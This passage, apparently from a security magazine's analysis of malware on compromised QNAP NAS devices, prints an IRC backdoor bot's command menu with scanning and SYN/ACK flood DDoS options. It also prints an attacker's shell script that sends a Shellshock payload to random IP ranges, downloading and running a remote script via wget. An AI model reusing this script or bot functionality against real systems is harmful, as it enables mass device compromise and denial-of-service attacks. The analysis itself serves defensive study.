Arming the NAS devices for DDOS attacks. Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability. Output from - Reverse engineering analyses. PRIVMSG %s :* .exec - execute a system command PRIVMSG %s :* .version show the current version of bot PRIVMSG %s :* .status show the status of bot PRIVMSG %s :* .help show this help message PRIVMSG %s :* *** Scan Commands PRIVMSG %s :* .advscan - scan with user:pass (A.B) classes sets by you PRIVMSG %s :* .advscan scan with d-link config reset bug PRIVMSG %s :* .advscan->recursive - scan local ip range with user:pass, (C.D) classes random PRIVMSG %s :* .advscan->recursive scan local ip range with d-link config reset bug PRIVMSG %s :* .advscan->random - scan random ip range with user:pass, (A.B) classes random PRIVMSG %s :* .advscan->random scan random ip range with d-link config reset bug PRIVMSG %s :* .advscan->random->b - scan local ip range with user:pass, A.(B) class random PRIVMSG %s :* .advscan->random->b scan local ip range with d-link config reset bug PRIVMSG %s :* .stop stop current operation (scan/dos) PRIVMSG %s :* *** DDos Commands: PRIVMSG %s :* NOTE: to 0 = random ports, to 0 = random spoofing, PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86 PRIVMSG %s :* .spoof set the source address ip spoof PRIVMSG %s :* .synflood - tcp syn flooder PRIVMSG %s :* .ngsynflood - tcp ngsyn flooder (new generation) PRIVMSG %s :* .ackflood - tcp ack flooder PRIVMSG %s :* .ngackflood - tcp ngack flooder (new generation) PRIVMSG %s :* *** IRC Commands: PRIVMSG %s :* .setchan set new master channel PRIVMSG %s :* .join - join bot in selected room PRIVMSG %s :* .part part bot from selected room PRIVMSG %s :* .quit kill the current process Issue 18 | Securitykaizen Magazine | 15 Screenshot from hacked NAS device with deployed payload can be controlled via CGI web backdoor http://X.X.X.X:8080/cgi-bin/exo.cgi Mass scanner for Shellshock This script is taken from a compromised NAS device. Attacker is using “pscan” multi threaded port scanner to search and hack for other vulnerable Qnap NAS devices. #!/bin/sh ## xXx@code 3-12-2014 rand=`echo $((RANDOM%255+2))` #url=”” url=”http://1xx.xx.xx.xx/S0.sh” download=”/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 \n\n\n” get=”GET /cgi-bin/authLogin.cgi HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: () { :; }; $download \n\n\n” ./pnscan -rQDoc -w”$get “-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &